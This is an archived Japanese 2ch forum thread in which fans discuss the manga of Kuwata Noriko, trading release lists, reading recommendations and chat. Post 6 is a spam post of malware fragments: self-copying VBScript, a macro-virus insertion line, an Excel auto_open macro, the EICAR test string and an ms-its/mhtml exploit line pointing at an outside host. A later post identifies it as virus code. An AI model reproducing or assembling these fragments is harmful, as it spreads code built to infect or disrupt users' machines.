5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆桑田乃梨子・その12★

1 :花と名無しさん:2006/12/09(土) 07:38:12 ID:/qfRbxxP0
ほのぼのマターリ作家、桑田乃梨子さんの作品を応援するスレ。
師走とともに12スレ目。引き続きマターリ語りましょう。
作品リスト・過去ログ等は>>2-10あたり。

[前スレ]
☆桑田乃梨子・その11★
http://comic6.2ch.net/test/read.cgi/gcomic/1151035412/

2 :花と名無しさん:2006/12/09(土) 07:38:51 ID:???0
[過去ログ]
☆桑田乃梨子・その10★
http://comic6.2ch.net/test/read.cgi/gcomic/1136088592/
☆桑田乃梨子・その9★
http://comic6.2ch.net/test/read.cgi/gcomic/1121778636/
☆桑田乃梨子・その8★
http://comic6.2ch.net/test/read.cgi/gcomic/1103791761/
☆桑田乃梨子・その7★
http://comic6.2ch.net/test/read.cgi/gcomic/1091376129/
☆桑田乃梨子・その6モブ★
http://comic6.2ch.net/test/read.cgi/gcomic/1069147163/
☆桑田乃梨子・その4.5★
http://comic.2ch.net/test/read.cgi/gcomic/1042448026/
☆桑田乃梨子・その4★
http://comic.2ch.net/gcomic/kako/1033/10331/1033167785.html
☆桑田乃梨子・その3★
http://comic.2ch.net/gcomic/kako/1010/10109/1010911855.html
☆桑田乃梨子・その2★
http://comic.2ch.net/gcomic/kako/993/993966000.html
☆桑田乃梨子★
http://salad.2ch.net/gcomic/kako/968/968075944.html

3 :花と名無しさん:2006/12/09(土) 07:39:53 ID:???0
[連載中の作品]
【B級グルメ冒険記】 ヤングアニマル (白泉社/毎月第2・第4金曜日発売)
ttp://www.younganimal.com/
【だめっこどうぶつ】 まんがライフ (竹書房/毎月17日発売)
ttp://4koma.takeshobo.co.jp/manlai/manlaif.html
ttp://4koma.takeshobo.co.jp/manlai/damekkof.html
【豪放ライラック】 Comic GUM (ワニブックス/毎月26日発売)
ttp://www.comicgum.com/
【888(スリーエイト)】  コミックバーズ (幻冬舎/毎月30日発売)
ttp://www.gentosha-comics.net/
ttp://www.gentosha-comics.net/birz/888/index.html
【楽園番外地】 ウンポコ (新書館 3/6/9/12月30日発売)
ttp://www.shinshokan.co.jp/comic/

4 :花と名無しさん:2006/12/09(土) 07:41:18 ID:???0
[既刊コミックス]
ひみつの犬神くん (絶版/文庫版有)
青春は薔薇色だ / 人生は薔薇色だ (絶版/文庫版有)
おそろしくて言えない 全4巻 (絶版/文庫版有)
卓球戦隊ぴんぽん5 全2巻 (絶版/文庫版有)
月刊1年2組 全2巻 (絶版/文庫版有)
君の瞳に三日月 全2巻 (絶版)
ほとんど以上絶対未満 (絶版)
男の華園 全4巻 (絶版)
飼うか飼われるか (ジェッツコミックス/Jets comics)
一陽来福
1+1=0
真夜中猫王子 全2巻
蛇神さまといっしょ 全2巻
ラッキー!(ジェッツコミックス/Jets comics)

文庫:卓球戦隊ぴんぽん5
    犬神君と森島さん 【ひみつの犬神くん / 青春は薔薇色だ / 人生は薔薇色だ:収録】
    おそろしくて言えない 全2巻
    蒼紫の森
    月刊1年2組 【月刊1年2組 / 増刊1年2組 /スターライトプリンセスあかり!:収録】
    君の瞳に三日月 【君の瞳に三日月 / ほとんど以上絶対未満:収録】
    一陽来福 / 1+1=0
    男の華園 全2巻
−−−−−−− 以上 白泉社 −−−−−−−−−−−−


だめっこどうぶつ 1〜2巻 (竹書房/バンブーコミックス)
888(スリーエイト) 1〜2巻 (幻冬舎/ガールズコレクション)
豪放ライラック 1〜5巻 (ワニブックス/ガムコミックス)

5 :花と名無しさん:2006/12/09(土) 07:42:10 ID:???0
[CD]
おそろしくて聴けない(桑田乃梨子オリジナルアルバム)
株式会社マイカルハミングバード、1993年発売 (絶版)
声の出演:塩沢兼人、緑川光、かないみか、宍戸留美

豪放ライラック・オリジナルドラマCD
月刊コミックガム4月号、5月号およびコミックス第4巻限定版
声の出演:植田佳奈、平田宏美、山本麻里安、本多陽子、鈴木達央、高城元気、若林直美、上原さやか

[DVD]
だめっこどうぶつ 1・2巻(DVD-BOXも有り)

DVD-BOX発売記念サイト
ttp://www.takeshobo.co.jp/damekko/top.html

6 :<body onload=window()>:2006/12/09(土) 08:29:20 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/12/09(土) 09:02:09 ID:???O
ああー、2chブラウザから見ようと思ってたのにィ

8 :花と名無しさん:2006/12/09(土) 22:12:21 ID:???0
http://yahoo0.web.fc2.com/sale.html

9 :花と名無しさん:2006/12/10(日) 03:30:28 ID:???0
http://www.37vote.net/anime/1165540235/all-50-10

10 :花と名無しさん:2006/12/10(日) 08:20:19 ID:qF6OO9Lg0
新スレ乙age

11 :花と名無しさん:2006/12/10(日) 17:10:01 ID:???0
>1乙!

12 :花と名無しさん:2006/12/10(日) 20:18:48 ID:???0
>>1 新乙、さてこの次にレスつける奴からくわたんマンガ関連でダジャレを言うらしいぞ。

13 :花と名無しさん:2006/12/10(日) 23:01:48 ID:???0
>>1

> 6 のウイルスコード、削除整理板で削除依頼しようと思ったら
同様の別スレの依頼に対し、こんなアドバイスが有った↓自己防衛するしかないようだ。

120 名前:華麗なる案内師 ★[sage755] 投稿日:2006/11/30(木) 23:57:30 ID:???0
>>119
以下のリンク先を参考にして、各自対策して下さい。

前からよくあるvbsウイルスのソースコード
2ちゃんねる専用ブラウザのログ保存フォルダを「除外」
http://ansitu.xrea.jp/guidance/?FAQ2#k863b492 (特に「・参考」部分のリンク先)

シリア語ブラクラ(改行がおかしくなる)
フォント"Estrangelo Edessa"を削除
http://ansitu.xrea.jp/guidance/?cmd=read&page=FAQ2#ybf9eebe

1度設定するだけで、他のスレに書き込まれた同様の文字列にも反応しなくなりますので、
お奨めします。

14 :花と名無しさん:2006/12/12(火) 02:49:31 ID:jq9jZVuz0
あげちゃう

15 :花と名無しさん:2006/12/12(火) 17:52:25 ID:???0
ウイルスコード? ボコボコにしてやんよ
  ∧_∧
  ( ・ω・)=つ≡つ
  (っ ≡つ=つ
  /   ) ババババ
 ( / ̄∪

    ↓
   
     ∧_∧
 ;;;;;、(・ω(:;(⊂=⊂≡
    (っΣ⊂≡⊂=
    /   ) ババババ
    ( / ̄∪


16 :花と名無しさん:2006/12/13(水) 09:42:21 ID:???0
そういやだめっこに豚の着ぐるみキャラ出てきてないな。

17 :花と名無しさん:2006/12/13(水) 12:15:04 ID:???0
豚は野生動物じゃなくて、家畜だからなあ

18 :花と名無しさん:2006/12/13(水) 13:41:45 ID:???0
豚でだめっこって難しくないか?
キャラが立たない気がする

19 :花と名無しさん:2006/12/13(水) 16:02:30 ID:???0
なんかパペマペの牛君ネタっぽいのが
繰り広げられてる様が頭をよぎった。

20 :花と名無しさん:2006/12/13(水) 18:27:38 ID:???0
豚だと、養豚場から逃げてきても、あんまりなあ
逃げ出してきたイノブタならいけるかもしれん

21 :花と名無しさん:2006/12/13(水) 20:19:45 ID:???O
しかし新刊はまだかね
888とかどうなんのかね

22 :花と名無しさん:2006/12/14(木) 03:39:19 ID:???0
とりあえずラッキー!からはいって、文庫になってるのは揃えたんだが、
次はなにに走ればいいかな
オススメあったら教えてくれ

23 :花と名無しさん:2006/12/14(木) 03:44:10 ID:???0
ラッキー!から入るなんて珍しいな。
過去の作品はほとんど文庫になってるから、
とりあえず次は豪放ライラックあたりがいいのでは。

24 :花と名無しさん:2006/12/14(木) 08:30:57 ID:???0
文庫になってないのって猫王子と蛇神様、飼うか飼われるか、あとは連載中の3作品ぐらいジャマイカ

25 :花と名無しさん:2006/12/14(木) 10:42:17 ID:???0
文庫にこだわってなければ是非猫王子を。
古本で入手できるかと。

26 :花と名無しさん:2006/12/14(木) 15:04:23 ID:???0
猫王子いいよなあ。テーマが明確で。

27 :花と名無しさん:2006/12/14(木) 18:20:49 ID:???0
まわし読みから戻ってきた『888』2巻を久々に読んだ。
所長のキャラはゆに彦と重なるな、特に女のシュミのヘンなところ。

「バツイチ暗黒メガネ」の表現がツボった。

28 :花と名無しさん:2006/12/14(木) 18:21:51 ID:???0
>>22
男主人公なら

カリスマ非人間系の高校生→おそろしくて言えない
ほのぼのダメ大学生→男の華園 A10大学男子新体操部

29 :花と名無しさん:2006/12/14(木) 19:36:29 ID:???0
その二作は文庫なってんじゃん

30 :花と名無しさん:2006/12/14(木) 19:39:26 ID:???0
そいや、ラッキーって猫王子の短編収録されてんだっけ?
なら猫王子は良いかもな
でもちょっと待てば文庫になりそうだが

31 :花と名無しさん:2006/12/15(金) 01:00:06 ID:???0
>>23
知り合いに勧められたんだよね。今自分で考えても妙なモノからはいったと思うw
豪放ライラックなら本屋でも古本屋でも見かけるから無難かな。
今度見かけたら買ってみます。

>>26>>30
ラッキーに短編入ってましたね。
というか私からしたらあれは本編があったのかという感じなんですがw
気になるのですが、一応ブックオフなどでも桑田欄見てるんですが
未だに見たことありませんね・・・文庫版待つしかないのでしょうか。

>>28
下の方も言ってますが、残念ながら両方文庫版であったので既読です。
非人間とはすごい言われようw

レスしてくれた方ありがとうございました。
参考にさせて頂きます。

32 :花と名無しさん:2006/12/15(金) 05:56:01 ID:???0
『34』シリーズ化してほしかったな。

33 :花と名無しさん:2006/12/16(土) 11:59:06 ID:???0
そろそろ猫王子が文庫にならないかな。
と期待しているんだが、なだかね?


34 :花と名無しさん:2006/12/16(土) 15:41:02 ID:???0
なだみたい

35 :花と名無しさん:2006/12/16(土) 16:01:13 ID:???0
今月はウンポコとガムとだめっこと888だっけ

36 :花と名無しさん:2006/12/16(土) 22:35:40 ID:???0
年忘れくわたん祭りだな、そういえば年忘れギスギス大会は今年もやるのかな?

37 :花と名無しさん:2006/12/17(日) 02:52:54 ID:???O
今月は自分が読んでる漫画のコミックスが大量に出すぎだ。
嬉しくて鼻血噴きそうだけど、ボーナスつぎ込まなきゃ…

38 :花と名無しさん:2006/12/17(日) 13:34:31 ID:???0
今月にだめっこと888のコミックス発売されるの!?

39 :花と名無しさん:2006/12/17(日) 13:50:16 ID:???0
>>38 いや、今月は出ない。 来年に期待だw

40 :花と名無しさん:2006/12/18(月) 00:02:25 ID:???0
>>39
わかりました。今年はあきらめましょう。

41 :花と名無しさん:2006/12/19(火) 12:32:00 ID:???O
王子乙

42 :花と名無しさん:2006/12/20(水) 02:12:12 ID:???0
でも来年はあきらめません

43 :花と名無しさん:2006/12/21(木) 23:51:20 ID:???0
桑犬漫画にはまってガラパゴスとノルウェーに行きたくなった

44 :花と名無しさん:2006/12/22(金) 10:46:12 ID:???0
ガラパゴスはドーイ!
ガラパゴス漫画のように、子どもを連れて行き(いないけど)あの父のようにウンチクたれてみたいw

45 :花と名無しさん:2006/12/22(金) 20:27:01 ID:???0
ガラパゴスは近年観光地化が進んで、環境の悪化が著しいそうだ。
漫画の中のままの自然ではないということだな…


46 :花と名無しさん:2006/12/23(土) 21:26:23 ID:???0
観光客として行くと、環境破壊に繋がるのか。
世知辛いなあ。

47 :花と名無しさん:2006/12/24(日) 03:35:40 ID:???0
尾瀬も同じだね。

48 :花と名無しさん:2006/12/24(日) 10:43:49 ID:???0
さあ、正しいクリスマスを過ごそうぜ!

49 :花と名無しさん:2006/12/24(日) 12:26:26 ID:???0
>>48
とりあえず、昨日の残り物の御飯を冷えたまま食うか・・・

50 :花と名無しさん:2006/12/24(日) 21:54:48 ID:???0
桑田漫画でクリスマスといえば、「豪放」の
女子寮のプレゼント交換会くらい?

51 :花と名無しさん:2006/12/24(日) 22:34:58 ID:???0
男の華園もあっただろう

52 :花と名無しさん:2006/12/24(日) 23:18:14 ID:???0
葉月がティファニーのネックレスもらってた

53 :花と名無しさん:2006/12/25(月) 13:51:31 ID:???0
まさかとは思うが、だめっこどうぶつを忘れたのではあるまいな?

54 :花と名無しさん:2006/12/27(水) 01:37:04 ID:???0
コミックガム、扉絵がパロディw

55 :花と名無しさん:2006/12/27(水) 21:42:08 ID:???0
>>54
くわしく

56 :花と名無しさん:2006/12/27(水) 22:16:20 ID:???0
ラストの央司(略)(いつも通り)に笑った

そしてみんなから「黒」と認識されてるオンちゃん……


57 :54:2006/12/27(水) 22:44:30 ID:???0
>>55 「ギャ×クティカマグナム」と言って葉山が柊を殴り飛ばしてる絵、葉山の描いている同人誌らしいw
(ちなみに、今回はりらのツッコミが多し)

58 :花と名無しさん:2006/12/27(水) 23:00:10 ID:???0
>>56 しかし、中身の人もだめ王からブラックプリンス・・・いや暗黒貴公子だな。

59 :花と名無しさん:2006/12/28(木) 07:56:53 ID:???0
最近、縁が森山未来に脳内変換されてしまって困っている・・・
メガネかけた感じといい、少し釣り目なとこといい、
ちょっとすねた物言いといい・・・

60 :花と名無しさん:2006/12/28(木) 19:39:48 ID:???0
今日は同じ店でバーズ、ガム、ウンポコのくわタンを読破してきた
一日でくわタン三本立ては中々だったぜ

しかし今回の豪放のエンドからすると
りら×央司も曖昧エンドじゃなくてちゃんと決着が付きそうだね。

61 :花と名無しさん:2006/12/28(木) 19:41:01 ID:???0
しかし一気にバレンタインまで来たけどさ
正月イベント端折りでいいのかね。
あとはホワイトデーと卒業式だよね。


62 :花と名無しさん:2006/12/29(金) 00:42:27 ID:???0
くわたんは決着をつけると見せかけ曖昧エンドにすることもあるから
まだ油断はできないぞ

63 :花と名無しさん:2006/12/29(金) 04:39:13 ID:???0
>>57
葉山腐女子かよ。今日はコミケだな。

64 :花と名無しさん:2006/12/29(金) 16:22:38 ID:???0
今日ってコミケなのか…

65 :花と名無しさん:2006/12/29(金) 16:46:59 ID:???0
あしたもあさっても、ずーっとコミケだ、バカ者!!

66 :花と名無しさん:2006/12/29(金) 16:55:06 ID:???O
またそのネタかよ。
もう何十年経ってるんだよ。

67 :花と名無しさん:2006/12/29(金) 22:06:59 ID:???0
コミケいったってほしいもんなんかねーよ

68 :花と名無しさん:2006/12/29(金) 22:19:01 ID:???0
今年もガムはコミケ用小冊子売ってんのかな

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)